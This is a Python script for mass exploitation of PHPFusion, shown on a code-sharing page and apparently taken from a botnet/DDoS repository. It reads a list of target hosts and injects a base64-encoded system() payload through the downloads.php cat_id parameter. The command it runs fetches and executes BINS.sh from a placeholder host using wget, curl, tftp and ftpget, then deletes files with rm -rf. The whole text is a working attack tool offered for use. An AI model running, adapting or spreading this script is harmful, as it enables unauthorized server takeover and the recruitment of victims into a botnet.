Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/PHPFusion.py
5038 views
1
import base64

2
import sys

3
import threading

4
import requests

5
import os

6
import subprocess

7
from Queue import *

8
from threading import Thread

9


10
#Get argv1 and parse it to the Queue

11
ips = open(sys.argv[1], "r").readlines()

12
queue = Queue()

13
queue_count = 0

14
def php(cmd):

15
    subprocess.call(cmd, shell=True)

16


17
#Replace this with your payload

18
cmd = "cd /tmp || cd /var/run || cd /mnt; wget http://IP/BINS.sh; curl -O http://IP/BINS.sh; chmod 777 BINS.sh; /bin/sh BINS.sh; tftp IP -c get tBINS.sh; chmod 777 tBINS.sh; /bin/sh tBINS.sh; tftp -r tBINS2.sh -g IP; chmod 777 tBINS2.sh; /bin/sh tBINS2.sh; ftpget -v -u anonymous -p anonymous -P 21 IP BINS1.sh BINS1.sh; /bin/sh BINS1.sh; rm -rf BINS.sh tBINS.sh tBINS2.sh BINS1.sh; rm -rf *"

19


20


21
# Begin exploit config

22
PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\""+cmd+"\");'  " # !!spaces are important in order to avoid ==!!

23
REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"

24
# End exploit config

25


26


27
# Encode payload to be ran on PHPFusion server

28
PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii").strip("=")

29


30


31
def phpfusion(host):

32
    print("[PHPFusion] Infected "+host)

33
    try:

34
        page_data = requests.get("http://" + host + "/infusions/downloads/downloads.php?cat_id=${system(ls)}")

35
        if "infusion_db.php" in page_data.text:

36
            requests.get(host + REQUEST_PAYLOAD.format(PAYLOAD_B64))

37
            print("[PHPFusion] Infected "+host)

38
    except:

39
        pass

40
    return

41


42


43
def main():

44
    global queue_count

45
    for line in ips:

46
        line = line.strip("\r")

47
        line = line.strip("\n")

48
        queue_count += 1

49
        sys.stdout.write("\r[%d] Added to queue" % (queue_count))

50
        sys.stdout.flush()

51
        queue.put(line)

52
    sys.stdout.write("\n")

53
    i = 0

54
    while i != queue_count:

55
        i += 1

56
        try:

57
            input = queue.get()

58
            thread = Thread(target=phpfusion, args=(input,))

59
            thread.start()

60
        except KeyboardInterrupt:

61
            os.kill(os.getpid(), 9)

62
    thread.join()

63
    return

64


65
if __name__ == "__main__":

66
    main()

67
            

68


69